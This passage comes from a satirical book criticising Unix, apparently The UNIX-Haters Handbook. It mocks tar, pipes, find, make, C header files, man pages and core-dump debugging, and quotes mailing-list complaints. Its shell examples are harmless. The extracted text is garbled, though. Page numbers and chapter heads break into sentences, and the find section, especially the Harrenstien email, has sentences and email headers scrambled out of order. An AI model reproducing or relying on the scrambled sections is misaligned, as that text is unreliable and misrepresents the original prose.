Consider this tar program. Like all Unix “tools” (and I use the word loosely) it works in strange and unique ways. For example, tar is a program with lots of positive energy and thus is convinced that nothing bad will ever happen and thus it never returns an error status. In
160 csh, pipes, and find
fact, even if it prints an error message to the screen, it still reports “good news,” i.e., status 0. Try this in a shell script: tar cf temp.tar no.such.file if( $status == 0 ) echo "Good news! No error." and you get this: tar: no.such.file: No such file or directory Good news! No error. I know—I shouldn’t have expected anything consistent, useful, documented, speedy, or even functional… Bjorn
Pipes
My judgment of Unix is my own. About six years ago (when I first got my workstation), I spent lots of time learning Unix. I got to be fairly good. Fortunately, most of that garbage has now faded from memory. However, since joining this discussion, a lot of Unix supporters have sent me examples of stuff to “prove” how powerful Unix is. These examples have certainly been enough to refresh my memory: they all do something trivial or useless, and they all do so in a very arcane manner. One person who posted to the net said he had an “epiphany” from a shell script (which used four commands and a script that looked like line noise) which renamed all his '.pas' files so that they ended with “.p” instead. I reserve my religious ecstasy for something more than renaming files. And, indeed, that is my memory of Unix tools—you spend all your time learning to do complex and peculiar things that are, in the end, not really all that impressive. I decided I’d rather learn to get some real work done. —Jim Giles Los Alamos National Laboratory Unix lovers believe in the purity, virtue, and beauty of pipes. They extol pipes as the mechanism that, more than any other feature, makes Unix Unix. “Pipes,” Unix lovers intone over and over again, “allow complex
Pipes 161
programs to be built out of simpler programs. Pipes allow programs to be used in unplanned and unanticipated ways. Pipes allow simple implementations.” Unfortunately, chanting mantras doesn’t do Unix any more good than it does the Hari Krishnas. Pipes do have some virtue. The construction of complex systems requires modularity and abstraction. This truth is a catechism of computer science. The better tools one has for composing larger systems from smaller systems, the more likely a successful and maintainable outcome. Pipes are a structuring tool, and, as such, have value. Here is a sample pipeline:3 egrep '^To:|^Cc:' /var/spool/mail/$USER | \ cut -c5- | \ awk '{ for (i = 1; i <= NF; i++) print $i }' | \ sed 's/,//g' | grep -v $USER | sort | uniq Clear, huh? This pipeline looks through the user’s mailbox and determines which mailing lists they are on, (well, almost). Like most pipelines, this one will fail in mysterious ways under certain circumstances. Indeed, while pipes are useful at times, their system of communication between programs—text traveling through standard input and standard output—limits their usefulness.4 First, the information flow is only one way. Processes can’t use shell pipelines to communicate bidirectionally. Second, pipes don’t allow any form of abstraction. The receiving and sending processes must use a stream of bytes. Any object more complex than a byte cannot be sent until the object is first transmuted into a string of bytes that the receiving end knows how to reassemble. This means that you can’t send an object and the code for the class definition necessary to implement the object. You can’t send pointers into another process’s address space. You can’t send file handles or tcp connections or permissions to access particular files or resources. At the risk of sounding like a hopeless dream keeper of the intergalactic space, we submit that the correct model is procedure call (either local or remote) in a language that allows first-class structures (which C gained during its adolescence) and functional composition.
3 4
Thanks to Michael Grant at Sun Microsystems for this example. We should note that this discussion of “pipes” is restricted to traditional Unix pipes, the kind that you can create with shell using the vertical bar (|). We’re not talking about named pipes, which are a different beast entirely.
162 csh, pipes, and find
Pipes are good for simple hacks, like passing around simple text streams, but not for building robust software. For example, an early paper on pipes showed how a spelling checker could be implemented by piping together several simple programs. It was a tour de force of simplicity, but a horrible way to check the spelling (let alone correct it) of a document. Pipes in shell scripts are optimized for micro-hacking. They give programmers the ability to kludge up simple solutions that are very fragile. That’s because pipes create dependencies between the two programs: you can’t change the output format of one without changing the input routines of the other. Most programs evolve: first the program’s specifications are envisioned, then the insides of the program are cobbled together, and finally somebody writes the program’s output routines. Pipes arrest this process: as soon as somebody starts throwing a half-baked Unix utility into a pipeline, its output specification is frozen, no matter how ambigious, nonstandard, or inefficient it might be. Pipes are not the be-all and end-all of program communication. Our favorite Unix-loving book had this to say about the Macintosh, which doesn’t have pipes: The Macintosh model, on the other hand, is the exact opposite. The system doesn’t deal with character streams. Data files are extremely high level, usually assuming that they are specific to an application. When was the last time you piped the output of one program to another on a Mac? (Good luck even finding the pipe symbol.) Programs are monolithic, the better to completely understand what you are doing. You don’t take MacFoo and MacBar and hook them together. —From Life with Unix, by Libes and Ressler Yeah, those poor Mac users. They’ve got it so rough. Because they can’t pipe streams of bytes around how are they ever going to paste artwork from their drawing program into their latest memo and have text flow around it? How are they going to transfer a spreadsheet into their memo? And how could such users expect changes to be tracked automatically? They certainly shouldn’t expect to be able to electronically mail this patchedtogether memo across the country and have it seamlessly read and edited at the other end, and then returned to them unscathed. We can’t imagine how they’ve been transparently using all these programs together for the last 10 years and having them all work, all without pipes.
Pipes 163
When was the last time your Unix workstation was as useful as a Macintosh? When was the last time it ran programs from different companies (or even different divisions of the same company) that could really communicate? If it’s done so at all, it's because some Mac software vendor sweated blood porting its programs to Unix, and tried to make Unix look more like the Mac. The fundamental difference between Unix and the Macintosh operating system is that Unix was designed to please programmers, whereas the Mac was designed to please users. (Windows, on the other hand, was designed to please accountants, but that’s another story.) Research has shown that pipes and redirection are hard to use, not because of conceptual problems, but because of arbitrary and unintuitive limitations. It is documented that only those steeped in Unixdom, not run-of-themill users, can appreciate or use the power of pipes. Date: From: To: Subject: Thu, 31 Jan 91 14:29:42 EST Jim Davis <jrd@media-lab.media.mit.edu> UNIX-HATERS Expertise
This morning I read an article in the Journal of Human-Computer Interaction, “Expertise in a Computer Operating System,” by Stephanie M. Doane and two others. Guess which operating system she studied? Doane studied the knowledge and performance of Unix novices, intermediates, and expert users. Here are few quotes: “Only experts could successfully produce composite commands that required use of the distinctive features of Unix (e.g. pipes and other redirection symbols).” In other words, every feature that is new in Unix (as opposed to being copied, albeit in a defective or degenerate form from another operating system) is so arcane that it can be used only after years of arcane study and practice. “This finding is somewhat surprising, inasmuch as these are fundamental design features of Unix, and these features are taught in elementary classes.” She also refers to the work of one S. W. Draper, who is said to have believed, as Doane says:
164 csh, pipes, and find
“There are no Unix experts, in the naive sense of an exalted group whose knowledge is exhaustive and who need not learn more.” Here I must disagree. It is clear that an attempt to master the absurdities of Unix would exhaust anyone. Some programs even go out of their way to make sure that pipes and file redirection behave differently from one another: From: To: Subject: Date: Leigh L. Klotz <klotz@adoc.xerox.com> UNIX-HATERS | vs. < Thu, 8 Oct 1992 11:37:14 PDT
collard% xtpanel -file xtpanel.out < .login unmatched braces unmatched braces unmatched braces 3 unmatched right braces present collard% cat .login | xtpanel -file xtpanel.out collard% You figure it out.
Find
The most horrifying thing about Unix is that, no matter how many times you hit yourself over the head with it, you never quite manage to lose consciousness. It just goes on and on. —Patrick Sobalvarro Losing a file in a large hierarchical filesystem is a common occurrence. (Think of Imelda Marcos trying to find her pink shoes with the red toe ribbon among all her closets.) This problem is now hitting PC and Apple users with the advent of large, cheap disks. To solve this problem computer systems provide programs for finding files that match given criteria, that have a particular name, or type, or were created after a particular date. The Apple Macintosh and Microsoft Windows have powerful file locators that are relatively easy to use and extremely reliable. These file finders were
Find 165
designed with a human user and modern networking in mind. The Unix file finder program, find, wasn’t designed to work with humans, but with cpio—a Unix backup utility program. Find couldn’t anticipate networks or enhancements to the file system such as symbolic links; even after extensive modifications, it still doesn’t work well with either. As a result, despite its importance to humans who’ve misplaced their files, find doesn’t work reliably or predictably. The authors of Unix tried to keep find up to date with the rest of Unix, but it is a hard task. Today’s find has special flags for NFS file systems, symbolic links, executing programs, conditionally executing programs if the user types “y,” and even directly archiving the found files in cpio or cpio-c format. Sun Microsystems modified find so that a background daemon builds a database of every file in the entire Unix file system which, for some strange reason, the find command will search if you type “find filename” without any other arguments. (Talk about a security violation!) Despite all of these hacks, find still doesn’t work properly. For example, the csh follows symbolic links, but find doesn’t: csh was written at Berkeley (where symbolic links were implemented), but find dates back to the days of AT&T, pre-symlink. At times, the culture clash between East and West produces mass confusion. Date: From: Subject: To: Thu, 28 Jun 1990 18:14 EDT pgs@crl.dec.com more things to hate about Unix UNIX-HATERS
This is one of my favorites. I’m in some directory, and I want to search another directory for files, using find. I do: po> pwd /ath/u1/pgs po> find ~halstead -name "*.trace" -print po> The files aren’t there. But now: po> cd ~halstead po> find . -name "*.trace" -print ./learnX/fib-3.trace ./learnX/p20xp20.trace ./learnX/fib-3i.trace ./learnX/fib-5.trace ./learnX/p10xp10.trace
“find” is becoming worthless. There isn’t even a switch to request this… the net effect is that enormous chunks of the search space are silently excluded. As networked systems become more and more complicated. I have relied on it for a long time to avoid spending hours fruitlessly wandering up and down byzantine directory hierarchies in search of the source for a program that I know exists somewhere (a different place on each machine. The so-called file system we have here is a grand spaghetti pile combining several different fileservers with lots and lots of symbolic links hither and thither. these problems are becoming harder and harder: Date: From: Subject: To: Wed. Even though the syntax is rather clumsy and gross. and force the users to deal with the result. copout solution is just not to follow symlinks. none of which the program bothers to follow up on. Unix. but it did nothing too fast) and investigation finally revealed that the directory was a symbolic link to some other place.166 csh. and find po> Hey. 2 Jan 1991 16:14:27 PST Ken Harrenstien <klh@nisc. Poor Halstead must have the entry for his home directory in /etc/passwd pointing off to some symlink that points to his real directory. The simple. What a crock of Unix. . of course). I finally realized this when my request to search a fairly sizeable directory turned up nothing (not entirely surprising. pipes.com> Why find doesn’t find anything UNIX-HATERS I just figured out why the “find” program isn’t working for me anymore. now the files are there! Just have to remember to cd to random directories in order to get find to find things in them. It turns out that in this brave new world of NFS and symbolic links. Why not modify find to make it follow symlinks? Because then any symlink that pointed to a directory higher up the tree would throw find into an endless loop. so some commands work for him and some don’t. It would take careful forethought and real programming to design a system that didn’t scan endlessly over the same directory time after time.sri.
First I tried: % find . dammit. I tried to use find. -name ’*. It’s not tokenizing that command like most other things do. that wasn’t doing anything… % find . hate.com> Q: what’s the opposite of ‘find?’ A: ‘lose. test -f c test -f c test -f c test -f c . find: Can’t execute test -f {}c: No such file or directory Oh. % find . I don’t want to mung the system software every time misfeatures like this come up. Hate.el’ -exec ’test -f {}c’ find: incomplete statement Oh yeah.el files in a directory tree that didn’t have a corresponding . hate. it wants a semicolon.el’ -exec echo test -f {}c \. hate.el’ -exec ’test -f {}c’ \. great.elc file. That should be easy. Well. I don’t want to use Unix. Date: From: Subject: To: Sat. hate. I remember. -name ’*. I don’t want to waste my time fighting SUN or the entire universe of Unix weeniedom. % find . -name ’*.’ UNIX-HATERS I wanted to find all .el’ -exec test -f {}c \. hate. —Ken (feeling slightly better but still pissed) Writing a complicated shell script that actually does something with the files that are found produces strange results. -name ’*.Find 167 I don’t want to have to check out every directory in the tree I give to find—that should be find’s job. What was I thinking. 12 Dec 92 01:15:52 PST Jamie Zawinski <jwz@lucid. a sad result of the shell’s method for passing arguments to commands. hate.
el c . Great.el | sed ’s/$/c/’ foo. test -f . test -f c test -f c test -f c . and find . Oh.. Or maybe… % find . great..el’ -exec echo test -f ’{}’c \.. I had come up with: % echo foo.. OK.. % find . Let’s see./bytecomp/byte-optimize./bytecomp/bytecomp.. test -f {}c test -f {}c test -f {}c test -f {}c . and {} isn’t really the magic “substitute this file name” token that find uses.el c test -f ./bytecomp/disass. -name ’*. think ‘I know. -name ’*.el c test -f .el c test -f . The shell thinks curly brackets are expendable.” Five tries and two searches through the sed man page later. I’ll use sed. I could use “sed…” Now at this point I should have remembered that profound truism: “Some people..168 csh. when confronted with a Unix problem. .’ Now they have two problems.. let’s run through the rest of the shell-quoting permutations until we find one that works. Now what. Huh? Maybe I’m misremembering. -name ’*./bytecomp/bytecomp-runtime. pipes.el’ \ -exec echo test -f ’{}’ c \.elc and then: % find .el’ \ -exec echo test -f `echo ’{}’ \ | sed ’s/$/c/’` \.
Variable syntax..el’ \ -exec echo test -f ’`echo "{}" |\ sed "s/$/c/"`’ \. .Find 169 % find .. test -f `echo "{}" | sed "s/$/c/"` test -f `echo "{}" | sed "s/$/c/"` test -f `echo "{}" | sed "s/$/c/"` . % find . -name ’*. -name ’*.el’ -exec echo test -f "`echo ’{}’ |\ sed ’s/$/c/’`" \.
and find Hey.el’ \ -exec echo test -f ’`echo {} | \ sed "s/$/c/"`’ \. Wait. that’s what I wanted. that last one was kind of close. and then I finally saw the light. It only spawns two processes per file in the directory tree we're iterating over. preying on my morbid fascination. test -f `echo {} | sed "s/$/c/"` test -f `echo {} | sed "s/$/c/"` test -f `echo {} | sed "s/$/c/"` .. Um. It’s the Unix Way! % find . then \ echo \ $FOO . I couldn’t stop myself. there are spaces around it.. I tried and tried. pipes. fi/’ | sh BWAAAAAHH HAAAAHH HAAAAHH HAAAAHH HAAAAHH HAAAAHH HAAAAHH HAAAAHH HAAAAHH!!!! —Jamie . It was fast. but the perversity of the task had pulled me in. That backquoted form is one token. No. It was easy. But then in the shower this morning I thought of a way to do it. I thought it was over. -name ’*. if [ ! -f \ ${FOO}c ].170 csh. So then I spent half a minute trying to figure out how to do something that involved “-exec sh -c …”. what do you want. and wrote some emacs-lisp code to do it. -name ’*.el’ -print \ | sed ’s/^/FOO=/’|\ sed ’s/$/. It only took me 12 tries to get it right. but why isn’t it substituting the filename for the {}??? Look. Maybe I could filter the backquoted form through sed. the blood of a goat spilt under a full moon? Oh. wait. It worked. I was happy. Now I just need to… % find . It had the same attraction that the Scribe implementation of Towers of Hanoi has.
Find 171 .
.
Breuel) It is true that languages like Scheme. . in fact. and Common Lisp come with powerful programming environments. one Unix lover made the following statement when defending Unix and C against our claims that there are far more powerful languages than C and that these languages come with much more powerful and productive programming environments than Unix provides: Date: From: 1991 Nov 9 tmb@ai.” —Anonymous If you learned about programming by writing C on a Unix box.mit. For example. for it is subtle and quick to core dump.9 Programming Hold Still. The sad fact is that Unix has so completely taken over the worldwide computer science educational establishment that few of today’s students realize that Unix’s blunders are not. then you may find this chapter a little mind-bending at first. sound design decisions. This Won’t Hurt a Bit “Do not meddle in the affairs of Unix. Smalltalk.edu (Thomas M.
174 Programming However. Unix can sure handle text. processes. and C language taken together address some large-scale issues that are not handled well (or are often not even addressed) in those languages and environments. It can also handle text.e. Yep. Oh. is what I do). Examples of such large-scale issues are certain aspects of memory management and locality (through process creation and exit).e.. Thomas Breuel credits Unix with one approach to solving the complicated problems of computer science. processes. shell. did I mention that Unix is good at handling text? —Mark . unfortunately. by the way. the Unix kernels. and human editable data representations (text). and IPC). Parallelism through pipes. 12 Nov 91 11:36:04 -0500 markf@altdorf..ai. these are handled quite well in the Unix environment. and IPC? Unix process overhead is so high that this is not a significant source of parallelism. it is ignoring the problem. From a practical point of view. this is not the approach that other sciences have used for solving problems posed by the human condition. the Bag O’ Bytes) be your sole interface to persistency is like throwing everything you own into your closet and hoping that you can find what you want when you need it (which. parallelism (by means of pipes. Date: From: To: Subject: Tue.mit. i. persistency (using files as data structures). Fortunately. Having Unix files (i.edu UNIX-HATERS Random Unix similes Treating memory management through process creation and exit is like medicine treating illness through living and dying. protection and recovery (through separate address spaces). It is like an employer solving a personnel shortage by asking his employees to have more children.
Here’s what Kernighan and Mashey have to say about it in their seminal article. and characters in files. today I spent so much time counting my C files that I didn’t really have time to do anything else. generally useful programs—tools— for helping with day-to-day programming tasks. etc. grep goto *. In fact. We will use them to illustrate other points in later sections of the article.c finds all the GOTOs.c counts a set of C source files. words. Interlisp is a very sophisticated programming environment. That’s what much of this programmer’s work consists of. wc *. These are “among the most useful”?!?! Yep. Interlisp had tools that in 1994 Unix programmers can only salivate while thinking about.” They claim Unix has a rich set of tools that makes programming easier. Another article in the same issue of IEEE Computer is “The Interlisp Programming Environment” by Warren Teitelman and Larry Masinter. The programs shown below are among the more useful.The Wonderful Unix Programming Environment 175 The Wonderful Unix Programming Environment The Unix zealots make much of the Unix “programming environment. In 1981. Much of any programmer’s work is merely running these and related programs. I think I’ll go count them again. For example. multiple columns. . wc files pr files lpr files grep pattern files Count lines. “The Unix Programming Environment:” One of the most productive aspects of the Unix environment is its provision of a rich set of small. Print all lines containing pattern. Print files with headings. Spool files onto line printer.
c++ This has not been true of other industries that have become extensively automated. not the lowest or median. few programmers of today’s machines know what it is like to use such an environment. Yet somehow Unix maintains its reputation as a programmer’s dream.c++ was relayed to the UNIX-HATERS mailing list. Maybe it lets programmers dream about being productive.… You may use the quote. Consistent mediocrity.’ The risk that people will misuse it is just too large. The Unix programming tools are meager and hard to use. they expect consistency. most PC debuggers put most Unix debuggers to shame. Programming in Plato’s Cave I got the impression that the objective [of computer language design and tool development] was to lift everyone to the highest productivity level. interpreters remain the play toy of the very rich. in all its glory. and change logs and audit trails are recorded at the whim of the person being audited. If I had known that. I would not have posted it in the first place. delivered on a large scale.” .lang. no matter how efficient it might be.lang. or anything I have written. The payoff for investing the time to use the tools would be that the programmer who learned the tools would be more productive for it. not haute cuisine. but not my name or affiliation. —Response to the netnews message by a member of the technical staff of an unnamed company. They decided to develop large sophisticated tools that took a long time to learn how to use. Sadly. That seems reasonable. rather than letting them actually be productive.176 Programming The designers of the Interlisp environment had a completely different approach.1 Unix is not the world’s best software environment—it is not even a good one. associated with anything with the title ‘UNIX-HATERS. I definitely do not want my name. —From a posting to comp. 1 This person wrote to us saying: “Apparently a message I posted on comp. is much more profitable than anything on a small scale. When people walk into a modern automated fastfood restaurant.
and that this utility could be easily implemented by writing a number of small utility programs and then piping them together.”. When the state machine is run.Programming in Plato’s Cave 177 Unix programmers are like mathematicians. . but we’re not. one gets a parser for the language. You may think we exaggerate.) Most C compilers today have a yacc-generated parser. “Recursive-descent” is computer jargon for “simple enough to write on a liter of Coke. yacc users must specify code fragments to be run at certain state transitions to handle the cases where context-free grammars blow up. the reason he said “You could write a program like that” instead of actually writing the program is that some properties of the C language and the Unix “Programming Environment” combine synergistically to make writing such a utility a pain of epic proportion. and it can’t. Some programming languages are easier to parse. “You could write a program like that. (Type checking is usually done this way. This scheme has one small problem: most programming languages are not context-free. Parsing with yacc “Yacc” was what I felt like doing after I learned how to use yacc(1). the yacc grammar for GCC 2.” To be fair. It takes a contextfree grammar describing a language to be parsed and computes a state machine for a universal pushdown automaton. The theory is well understood since one of the big research problems in the olden days of computer science was reducing the time it took to write compilers. —Anonymous “YACC” stands for Yet Another Compiler Compiler. It’s a curious phenomenon we call “Programming by Implication.1 (an otherwise fine compiler written by the Free Software Foundation) is about 1650 lines long. Thus. for example.” As an experiment. can be parsed by a recursive-descent parser. Lisp. The actual code output by yacc and the code for the universal pushdown automaton that runs the yacc output are much larger.
* If the incoming packet was addressed directly to us. Stop. it would not have even filled a page. It kind of makes you wonder what kinds of drugs they were doing back in the olden days. Perhaps they needed open research problems and writing parsers for these hard-to-parse languages seemed like a good one. Each node of the dependency graph contains a set of commands to be run when that node is out of date with respect to the nodes that it depends on. the other day we were looking for all uses of the min function in some BSD kernel code. Today.178 Programming we wrote a recursive-descent parser for Lisp. at the same time. oip->ip_len). “Don’t know how to make love.” The ideal programming tool should be quick and easy to use for common tasks and. Die-hard Unix aficionados would say that you don’t need this program since grep is a perfectly good solution. and disseminated languages that were so hard to parse. Unfortunately. in their zeal to be general. powerful enough to handle tasks beyond that for which it was intended. the complexity of the C language and the difficulty of using tools like yacc make them that way. * Retrieve any source routing from the incoming packet. In abstract terms. Well. Nodes corresponds to files. % Yep. C compiler front ends are complex artifacts. No wonder nobody is rushing to write this program. and the file dates determine . sociologists and historians are unable to determine why the seemingly rational programmers of the time designed. you can use grep in shell pipelines. grep finds all of the occurrences of min. implemented. If the parser had been written in Lisp. Plus. The olden days mentioned above were just around the time that the editors of this book were born. many Unix tools forget about the quick and easy part. * to the incoming interface. Here’s an example of what we got: % grep min netinet/ip_icmp. and then some. Make is one such tool. Dinosaurs ruled the machine room and Real Men programmed with switches on the front panel. * that not corrupted and of at least minimum length. It took about 250 lines of C. A program to parse C programs and figure out which functions call which functions and where global variables are read and modified is the equivalent of a C compiler front end. make’s input is a description of a dependency graph.c icmplen = oiplen + min(8.
o program When either source1. necessitating a recompile and a relink.o nodes. In fact. make will regenerate program by executing the command cc -o program source1.o and program will be out of date.c source2. very few novice Unix programmers know exactly how utterly easy it is to screw yourself to a wall with make. the designers forgot to make it easy to use for common cases. of course. And.o source2.c cc -c source1.o cc -o program source1. is shown below: program: source1.o. A small dependency graph. is trying to find a bug in source1.o.o source1.o source1. let’s say that our programmer. source1.o and source2.o source2.Programming in Plato’s Cave 179 whether the files are out of date with respect to each other. call him Dennis.c source1. While make’s model is quite general.c and therefore wants to compile this file with debugging information included.o: source1.c. or Makefile.o.o source2. The node program depends on the source1. To continue with our example. source2.o or source2. if source1.c source2.o: source2.c has been modified.c In this graph.c cc -c source2. Here is a graphical representation of the same makefile: source1. He modifies the Makefile to look like this: . the nodes are program. until they do it.o is newer than program. and source2. source1.c. then both source1.
The make program ignores them. the program complains: Make: Makefile: Must be a separator on line 4.o # I'm debugging source1. along with the space character and the newline character. hence the error.180 Programming program: source1. And now there’s nothing left to do with the poor kid from Kansas but shoot him in the head to put him out of his misery. He thinks there might be something wrong with the comment line.o: source1.o source2. he inadvertently inserted a space before the tab character at the beginning of line 2.c The line beginning with “#” is a comment. -Dennis .c cc -c source2. but he is not sure.” and most programs do. the tab character. The tab character is a very important part of the syntax of Makefiles. then several hours. there are no trip wires to watch out for in Kansas corn fields. Well. All command lines (the lines beginning with cc in our example) must start with tabs. He stares at his Makefile for several minutes. The problem with Dennis’s Makefile is that when he added the comment line. Whitespace is a technical term which means “you should just ignore them. Most programs treat spaces and tabs the same way. After all. when poor Dennis runs make. but can’t quite figure out what’s wrong with it.c cc -c -g source1. “So what?” you ask.o: source2. line 2 didn’t.o cc -o program source1. WHAM! You see. Except make (and cu and uucp and a few other programs). “What’s wrong with that?” There is nothing wrong with it. After he made his change.o source2.c source2. using tabs as part of the syntax is like one of those pungee stick traps in The Green Berets: the poor kid from Kansas is walking point in front of John Wayne and doesn’t see the trip wire.c source1. It’s just that when you consider how other programming tools work in Unix. are commonly known as whitespace characters. by itself. Stop And then make quits.
Now.c that has some data structure definitions in foo. Like most things in Unix. you probably know that “foo” is a popular name among computer programmers. Header files are included by using the C preprocessor #include directive.h> in his C file instead of: #include "foo.h> and: #include "header2. which lives in the same directory.h and stored it in the default include file directory.h. You and I probably know that the Joey probably has: #include <foo. He is puzzled since the compiler generates a syntax error every time he mentions any of the data structures defined in foo.h" . Header Files C has these things called header files. /usr/include. They are files of definitions that are included in source files at compilation time. Poor Joey goes to compile his foo. Joey has a C program named foo. It turns out that the systems programmer for Joey’s machine also made a file named foo. This directive has two syntaxes: #include <header1. He’s now stuck in a dead-end job where he has to wear a paper hat and maintains the sendmail configuration files for a large state university in the midwest.Programming in Plato’s Cave 181 Dennis never found the problem with his Makefile. This basically means that the implementation is free to do whatever the hell it wants.h" The difference between these two syntaxes is implementation dependent. It is frequently difficult to calculate which header files to include in your source file. Let’s say Dennis has a friend named Joey who is also a novice Unix programmer. they work reasonably well when there are one or two of them but quickly become unwieldy when you try to do anything serious. It’s a damn shame.h look okay.c program and is surprised to see multiple syntax errors. But the definitions in foo.h.
instead of being able to learn a single set of conventions for command line arguments. which is a great tool for producing parsers for syntactically correct programs (the infrequent case). this situation occurs whenever you try to write a C program that does anything useful. In the compiler community.” The missing semicolon has thrown the compiler’s parser out of sync with respect to the program text. This freedom is annoying. the compiler will testily inform you that you have a syntax error. a C compiler tends to get so confused and annoyed that it bursts into tears and complains that it just can’t compile the rest of the file since the one missing semicolon has thrown it off so much. The point is that Joey is hosed. get the wonderful job of sorting out these dependencies and including the header files in the right order. if you make even a small omission. error-detecting and -correcting parsers. If you get the order wrong. and it’s probably not his fault.” which is compiler jargon for “I’ve fallen and I can’t get up. Or maybe he is using quotes but is using a compiler with slightly different search rules for include files. the compiler will help you. Unfortunately. each is free to interpret its command-line arguments as it sees fit. you have to read a man page for each program to figure out how to use it. this phenomenon is known as “cascade errors. Utility Programs and Man Pages Unix utilities are self-contained. Experienced C programmers know to ignore all but the first parse error from a compiler. as the programmer. The “SYNOPSIS” sums it up nicely. The compiler is a busy and important program and doesn’t have time to figure out the difference between a missing data structure definition and a plain old mistyped word.182 Programming but Joey doesn’t know that. Of course. It’s a good thing the man pages are so well written. Header files typically define data structures and many header files depend on data structures defined in other header files. Having a large number of header files is a big pain. In fact. like a single semicolon. don’t you think? . but a horrible tool for producing robust. Take this following example. You. The poor compiler just can’t concentrate on the rest. The compiler probably has such a hard time with syntax error because it’s based on yacc.
the output is sorted alphabetically. The option setting based on whether the output is a teletype is undesirable as “ls -s” is much different than “ls -s | lpr”. The output device is assumed to be 80 columns wide. not doing this setting would make old shell scripts which used ls almost certain losers. for each file argument..list contents of directory SYNOPSIS ls [ -acdfgilqrstu1ACLFR ] name .Programming in Plato’s Cave 183 LS(1) Unix Programmer's Manual LS(1) NAME ls . When several arguments are given. On the other hand. DESCRIPTION For each directory argument. Take this example from the shell’s man page: . There are a large number of options: [.. A game that you can play while reading man pages is to look at the BUGS section and try to imagine how each bug could have come about.. ls repeats its name and any other information requested. When no argument is given. the arguments are first sorted appropriately. ls lists the contents of the directory.] BUGS Newline and tab are considered printing characters in file names. the current directory is listed.. By default. but file arguments are processed before directories and their contents.
shift. umask. and once again sent the patch back to Berkeley. for. Berkeley released a new version of Unix with the make bug still there. trap. DESCRIPTION Sh is a command programming language that executes commands read from a terminal or a file. the programmer could have fixed the damn bug. [. set.. :. and the shell complains about not being able to find the file by another name. times. readonly.command language SYNOPSIS sh [ -ceiknrstuvx ] [ arg ] . export. break... A year later. A garbage file /tmp/sh* is created.] BUGS If << is used to provide standard input to an asynchronous process invoked by &. exec. wait . Way back in the early 1980s.” Unfortunately. The BBN hackers fixed the bug a second time. it occurred to me that in the time it must have taken to track down the bug and write the BUGS entry. cd.. eval. . but we couldn’t even figure out what the hell they were talking about. continue. case. “As I stared at it and scratched my head. read. a programmer at BBN actually fixed the bug in Berkeley’s make that requires starting rule lines with tab characters instead of any whitespace. . exit. It wasn’t a hard fix—just a few lines of code. login. One Unix expert we showed this to remarked. See invocation for the meaning of arguments to the shell. before each of the bugs in Unix had such a large cult following. We spent several minutes trying to understand this BUGS section. fixing a bug isn’t enough because they keep coming back every time there is a new release of the OS.184 Programming SH(1) Unix Programmer's Manual SH(1) NAME sh. while. Like any group of responsible citizens. the shell gets mixed up about naming the input document.. the hackers at BBN sent the patch back to Berkeley so the fix could be incorporated into the master Unix sources. if.
After all. and generally try very hard to be unfriendly to people trying to understand them. “Reading the Unix kernel source is like walking down a dark alley. . they went through all of their Makefiles. use plenty of goto’s. (According to legend. I suddenly stop and think ‘Oh no. the Berkeley Network Tape 2 sources available from ftp. after he realized that the syntax was broken. do not skip any lines between “paragraphs” of code. BBN was paying them to write new programs. —A Unix programmer Back in the documentation chapter. Instead of fixing the bug in Berkeley make. found the lines that began with spaces.’ ” Of course.Programming in Plato’s Cave 185 …The third time that Berkeley released a version of make with the same bug present.net) are mostly uncommented. As one hacker put it. it should be hard to understand.” But trying to understand Unix by reading its source code is like trying to drive Ken Thompson’s proverbial Unix car (the one with a single “?” on its dashboard) cross country. the kernel sources have their own version of the warning light. Sprinkled throughout are little comments that look like this: /* XXX */ These mean that something is wrong. not to fix the same old bugs over and over again. Great! If it was hard to write. You should be able to figure out exactly what it is that’s wrong in each case.” says one noted Unix historian. Oh. we said that Unix programmers believe that the operating system’s source code is the ultimate documentation. I’m about to be mugged.uu. because he already had 10 users. The Unix kernel sources (in particular. “After all. and turned the spaces into tabs. “the source is the documentation that the operating system itself looks to when it tries to figure out what to do next. the hackers at BBN gave up.) The Source Is the Documentation. Stu Feldman didn’t fix make’s syntax.
accidents. There are two schools of debugging thought. Core files are large because they contain almost everything you need to debug your program from the moment it died: stack. a broken program dies. your first task is to find it. any files it might have had opened are now closed. Unix follows the older “debugging as autopsy” model. Those with the code know that fixing bugs won’t help. data. that is like a dead body in more ways than one. This shouldn’t be too difficult a task. As an added slap. it has to be that way. one cannot run a debugger as a command-interpreter or transfer control to a debugger when the operating system generates an exception. In Unix.186 Programming “It Can’t Be a Bug. If you were debugging a network program. why not solve it once and for all instead of for a single case that will have to repeated for each new program ad infinitum? Perhaps early Unix programmers were closet metaphysicians that believed in Nietzche’s doctrine of Eternal Recurrence. Interestingly enough. That’s why when most Unix programmers encounter a bug. My Makefile Depends on It!” The programmers at BBN were generally the exception. Dealing with the Core After your program has written out a core file. One is the “debugger as physician” school. Unfortunately. In these environments. pointers to code… everything. just as people do. because the core file is quite large— 4. the program’s network connections are gone. The only way to have a debugger take over from your program when . the debugger/physician can diagnose the problem and make the program well again. it’s too late. and negligence. 8. except the program’s dynamic state. It’s a sad state of affairs: if one is going to solve a problem. under Unix. leaving a core file. Unix programs tend to die from curable diseases. A Unix debugger then comes along and determines the cause of death. For instance. the debugger is always present in the running program and when the program crashes. Most Unix programmers don’t fix bugs: most don’t have source code. which was popularized in early ITS and Lisp systems. in fact. by the time your core file is created. and even 12 megabyte core files are not uncommon. they simply program around it.
Michael Tiemann came up with 10 reasons why Unix debuggers overwrite the existing “core” file when they themselves dump core: Date: From: To: Subject: Thu. 8. 9.com> UNIX-HATERS Unix debuggers David Letterman’s top 10 weenie answers are: 10. Can you imagine running an emacs with three context switches for every keystroke? Apparently. Unix enshrines its bugs as standard operating procedure. and if they dump core. 17 Jan 91 10:28:11 PST Michael Tiemann <tiemann@cygnus. under some versions of Unix you can attach a debugger to a running program. The Bug Reliquary Unlike other operating systems.stanford. they might have bugs. sploosh. Date: From: To: Subject: Wed. It’s too hard to implement. the idea of routine debugging is alien to the Unix philosophy. It would require a change to the documentation. your debugger program must intercept every interrupt and forward the appropriate ones to your program. Sure would be nice if there was some way to let applications control how and when and where they dump core.“It Can’t Be a Bug. It would break existing code. The most oft-cited reason that Unix bugs are not fixed is that such fixes would break existing programs. Thinking about these issues. considering that Unix programmers almost never consider upward compatibility when implementing new features.2 If you want to debug interrupts. 2 Yes. but you’ve still got to have a copy of the program with the symbols intact if you want to make any sense of it. 2 Jan 91 07:42:04 PST Michael Tiemann <cygint!tiemann@labrea. This is particularly ironic. and if they had any bugs. they might dump core. . there goes the core file from the application you were trying to debug.edu> UNIX-HATERS Debuggers Ever wonder why Unix debuggers are so lame? It’s because if they had any functionality at all. My Makefile Depends on 